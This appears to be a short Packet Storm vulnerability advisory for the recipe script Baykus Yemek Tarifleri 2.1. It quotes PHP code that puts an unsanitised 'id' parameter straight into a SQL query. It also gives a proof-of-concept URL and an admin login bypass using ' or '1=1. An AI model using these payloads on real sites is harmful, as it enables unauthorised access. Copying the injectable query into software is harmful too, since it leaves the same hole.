Baykus Yemek Tarifleri versions 2.1 and below suffer from a remote SQL injection vulnerability.
4c1d72683f2c982e0ef04409ca809c2b# Baykus Yemek Tarifleri <= 2.1 SQL Injection Vulnerability
# By cr4wl3r
# Download: http://scripti.org/i/Yemek.rar
############################################################
# Code:
include("ayar.php");
$ids= $_GET["id"];
$yaz= mysql_fetch_array(mysql_query("select * from tarifler where id='$ids'"));
mysql_select_db("yemek");
mysql_query("SET NAMES ´latin5´");
mysql_query("SET CHARACTER SET latin5");
$baslik= $yaz["baslik"];
$resim = $yaz['resim'];
if($resim==""){
$resim= "bos.png";
}
$kisa= $yaz["kisa"];
$tarif= $yaz["metin"];
############################################################
# PoC: [path]/oku.php?id=[SQL]
############################################################
# Auth Bypass
# [path]/Admin/giris.php
# Username: ' or '1=1
# password: ' or '1=1
############################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!